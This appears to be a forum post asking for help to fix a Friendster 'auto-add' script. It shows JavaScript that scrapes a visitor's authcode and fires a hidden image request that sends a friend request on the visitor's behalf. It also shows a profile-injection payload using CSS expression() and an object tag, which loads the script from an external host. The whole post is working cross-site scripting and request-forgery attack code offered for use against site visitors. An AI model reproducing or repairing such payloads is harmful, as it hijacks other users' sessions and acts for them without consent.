i hav followed xavy code...
//Place on Top
var afaimg = document.createElement('span');
afaimg.id = "addme";
document.getElementsByTagName('head')[0].appendChild(afaimg);
//under the onload handler
var eadd = "samilbz@yahoo.com";
var k = document.getElementById("controlPanelButtons").innerHTML;
var a = k.slice(k.indexOf("authcode="));
var m = a.slice(9,39);
document.getElementById("addme").innerHTML = "<img src=\"http://www.friendster.com/addfriendrequest.php?authcode="+m+"&uid="+pageOwnerID+"&email="+eadd+"&firstname=&lastname=&friend=&submit=1\" width=\"0\" height=\"0\" />";
then i save it in .js,,,after that i hav uploaded it in freewebtown
then i get the url of my js
http://www.freewebtown.com/samilbs/js/autoadd.js
and i paste that url in this code
<p id='fs' style="myjs:expres\sion(function l(){v=document.createElement('script');v.src='http://www.freewebtown.com/samilbs/js/autoadd.txt';navigation.appendChild(v)}l());text:expres\sion(fs.style.myjs='0');visibility:hidden"></p><object width="0" type=text/javascript data=" javascript:v=document.createElement('script');v.src='http://www.freewebtown.com/samilbs/js/autoadd.txt';parent.document.getElementById('navigation').appendChild(v);"></object>
and i change the js into txt...
then i paste the code in my about me and my media box...
but still nothing happen...when i try to create another account in FS and viewed my profile..
then i log my original FS acc,
but there is no friend request...
is der sumting i hav missed?
can u help me guys??